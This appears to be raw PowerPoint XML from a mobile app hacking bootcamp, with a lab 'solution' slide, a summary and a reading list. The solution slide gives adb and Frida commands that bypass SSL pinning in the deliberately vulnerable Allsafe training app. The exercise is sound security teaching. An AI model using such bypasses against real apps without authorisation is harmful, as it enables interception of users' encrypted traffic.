              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "/data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</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frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-server &amp;"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>codeshare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pcipolloni</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universal</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android</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ssl</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pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-bypass-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -U -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>infosecadventures.allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --no-pause</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11 : SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> Bypass [Solution]</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302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Output:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1"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11 : SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> Bypass</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2CD092-56F8-4074-A9C0-C3F732A4C7B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="2359700"/>
            <a:ext cx="8503056" cy="3260964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25808629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F145-143E-44E1-ABA4-68D8049EFC7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9379511-431F-4F8A-AE5A-B6471494F3D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Rectangle 133123">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE1E5671-B01E-4B19-B868-8061487D2B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063" y="4568825"/>
            <a:ext cx="2428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6D16A9A1-F2B7-4756-8180-2FEB52453EF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="418729" y="3565258"/>
            <a:ext cx="5367337" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83EEADC9-C584-41B7-9726-98F69C97D82F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536574" y="1813635"/>
            <a:ext cx="4679950" cy="3814167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> VM/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tools</a:t>
            </a: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r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacking mobile apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>testing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3813533668"/>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FF57F-5A99-4ACB-A8F6-43CBCAC2B7C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Further readings </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D3FD498-CE07-453B-B8D2-69BEA439D6E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Hungry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> for more ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C323A5A-D968-4BB4-ACEC-F0C03C20290C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="1447801"/>
            <a:ext cx="8503057" cy="5565395"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>PoCs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.oversecured.com/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.nowsecure.com/blog/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> apps :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/B3nac/InjuredAndroid/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/oversecured/ovaa</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> reports :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/B3nac/Android-Reports-and-Resources</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://7asecurity.com/publications</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11935584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FF57F-5A99-4ACB-A8F6-43CBCAC2B7C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Further readings </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D3FD498-CE07-453B-B8D2-69BEA439D6E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Hungry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> for more ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D524C67-892C-4993-824A-6EAAD66ABF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603323" y="2131060"/>
            <a:ext cx="2062186" cy="3071153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9121A3-C0AE-4254-B7AC-5895AF5C8F60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="828263" y="2117102"/>
            <a:ext cx="2461363" cy="3045937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 4" descr="OWASP Mobile Security Testing Guide">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33F3E4E-1CA3-A814-51E7-82E05FC2C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206" y="2117102"/>
            <a:ext cx="2316056" cy="305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4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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>About </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Bootcamp</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11266" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE1D8846-6997-41E9-72EE-F461037E2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79" t="22610" r="76703" b="37067"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="549358" y="2399043"/>
            <a:ext cx="1711522" cy="2059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E846FEE-127A-B8CE-5295-05FA076F0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461" t="52507" r="23736" b="5399"/>
          <a:stretch/>
        </p:blipFill>
